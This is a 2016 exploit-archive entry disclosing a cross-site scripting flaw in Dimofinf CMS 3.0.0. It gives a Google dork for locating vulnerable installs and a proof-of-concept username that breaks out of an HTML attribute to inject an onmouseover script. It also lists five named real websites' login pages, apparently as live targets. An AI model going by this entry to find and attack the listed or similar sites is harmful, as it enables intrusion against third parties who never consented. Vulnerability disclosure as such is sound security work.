Dimofinf CMS 3.0.0 Cross Site Scripting
Published
Credit
Risk
2016.02.18
Persian Hack Team
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes
Dork: "Powered by Dimofinf cms Version 3.0.0"
######################
# Exploit Title : Dimofinf CMS 3.0.0 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.dimofinf.net/index.php
# Google Dork : "Powered by Dimofinf cms Version 3.0.0"
# Date: 2016/02/17
# Version = 3.0.0
######################
# PoC:
# Username: MobhaM" onmouseover=alert("MobhaM") bad="
# Password : 0
#
# http://www.dawadmisms.net/dimcp/login.php
# http://www.aswarzan.com/dimcp/login.php
# http://drhananclinic.com.sa/dimcp/login.php
# http://www.newsqassim.com/dimcp/login.php
# http://www.sudaninet.net/dimcp/login.php
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################